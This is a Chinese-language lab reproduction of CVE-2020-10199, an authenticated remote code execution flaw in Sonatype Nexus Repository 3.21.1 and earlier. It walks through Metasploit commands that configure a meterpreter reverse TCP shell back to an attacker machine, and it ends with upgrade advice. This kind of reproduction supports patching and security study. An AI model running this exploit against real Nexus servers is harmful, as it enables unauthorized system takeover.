1.影响版本
Nexus Repository《=3.21.1
2.漏洞描述
Sonatype Nexus 是一个 Maven 的仓库管理系统,在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。
3.环境准备
攻击机器:Kali 192.168.157.130
受害机器:docker镜像:192.168.157.148
PS:需要Nexus Repository账户密码
4.环境搭建
1)使用docker安装
2)访问目标地址
5.漏洞复现
1)利用msf工具,加载攻击模块,配置参数
msf6 > search cve-2020-10199
msf6 > use exploit/linux/http/nexus_repo_manager_el_injection
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/nexus_repo_manager_el_injection) > set RHOST 192.168.157.148
RHOST => 192.168.157.148
msf6 exploit(linux/http/nexus_repo_manager_el_injection) > set LHOST 192.168.157.130
LHOST => 192.168.157.130
msf6 exploit(linux/http/nexus_repo_manager_el_injection) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(linux/http/nexus_repo_manager_el_injection) > set LPORT 4444
LPORT => 4444
2)攻击成功,获取shell
6.漏洞修复
升级至最新版本
下载地址:https://help.sonatype.com/repomanager3/download/